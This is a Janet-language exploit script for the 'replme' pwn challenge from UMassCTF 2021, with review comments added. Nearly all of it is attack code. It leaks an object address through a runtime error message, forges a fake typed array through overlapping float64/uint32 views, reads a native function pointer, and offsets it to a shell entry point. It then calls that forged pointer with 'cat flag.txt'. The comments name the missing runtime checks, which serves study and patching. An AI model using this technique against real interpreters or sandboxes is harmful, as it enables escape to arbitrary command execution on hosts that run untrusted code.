UMassCTF 2021 - replme
# CTF: UMassCTF 21
# Challenge: replme
# Description: I found this new programming language and wanted people to be able to try it out. http://34.72.244.178:8085
# http://static.ctf.umasscybersec.org/pwn/8ff0476d-85f1-40f8-84ca-ade94b5b0169/janet.zip
(defn hex2n
  "Convert a string of hexadecimal digits (most significant first) to a number.

  Bytes >= 65 are mapped as `A` = 10 upward; every other byte is treated as an
  ASCII decimal digit. Nothing is validated, so only 0-9 and uppercase A-F
  give meaningful results."
  [x]
  (var total 0)
  (var shift 0)
  # Walk the digits from least to most significant, four bits per digit.
  (each digit (reverse x)
    (def nibble
      (if (>= digit 65)
        (+ (- digit 65) 10)
        (- digit 48)))
    (+= total (blshift nibble shift))
    (+= shift 4))
  total)
(defn leak
  "Call `param` with no arguments and, if that raises, read an address out of
  the error text.

  On error, characters 7-21 of the message are printed, characters 9-13 are
  parsed with hex2n and stored under :hi, and characters 13-21 under :lo.
  Returns the table, which stays empty when the call does not raise.

  NOTE(review): the fixed offsets assume the message starts with the printed
  form of the value followed by its address; that format comes from the
  runtime and is not shown here. An error message that exposes raw addresses
  to untrusted code is the weakness this function depends on."
  [param]
  (def parts @{})
  (try
    (param)
    ([msg]
      (print "Leaked array address: " (string/slice msg 7 21))
      # Split the address into its leading 4 and trailing 8 hex digits.
      (put parts :hi (hex2n (string/slice msg 9 13)))
      (put parts :lo (hex2n (string/slice msg 13 21)))))
  parts)
# Proof-of-concept driver for the challenge build. It combines the address
# disclosure from `leak` with typed-array views over a shared buffer. The
# steps are annotated so each one can be mapped to the runtime check that
# would stop it.

# A one-element array holding the built-in `print`; `leak` recovers an
# address from the error raised when the array is called.
(var array @[print])
(var leaked (leak array))

# One 8-byte buffer seen through two overlapping views at offset 0: a single
# float64 and two uint32 halves, so writing the halves sets the float's bits.
(var buffer (tarray/buffer 8))
(var buffer_float64_view (tarray/new :float64 1 1 0 buffer))
(var buffer_uint32_view (tarray/new :uint32 2 1 0 buffer))

# Upper half: 0xffff0000 plus the leaked high digits. Lower half: the leaked
# low digits plus 0x18.
# NOTE(review): presumably this matches the runtime's boxed-value encoding
# for a reference 0x18 bytes into the array object -- the interpreter source
# is not on this page, confirm against it.
(set (buffer_uint32_view 1) (+ 0xffff0000 (get leaked :hi)))
(set (buffer_uint32_view 0) (+ (get leaked :lo) 0x18))
# used to leak print (cfun_io_print) address
# The float64 element is passed in the position where the earlier tarray/new
# calls pass `buffer`.
# NOTE(review): that this works suggests the value read back from the float64
# view is not normalised and the backing-store argument is not type-checked;
# those are the two checks a fixed runtime would need.
(var fake_buffer_uint32_view (tarray/new :uint32 10 1 0 (buffer_float64_view 0)))
# cfun_io_print + 0x3fd0 = &os_shell
# The 0x3fd0 offset is the author's figure for this particular challenge
# binary; the two words read through the fake view are written back into the
# shared buffer with that offset added to the low word.
(set (buffer_uint32_view 1) (get fake_buffer_uint32_view 1))
(set (buffer_uint32_view 0) (+ (get fake_buffer_uint32_view 0) 0x3fd0))
# The rewritten float64 element is then called like a function with a command
# string as its argument.
# NOTE(review): per the comment above, the shell entry point is still present
# in the binary even though the REPL does not expose it by name.
((buffer_float64_view 0) "cat flag.txt")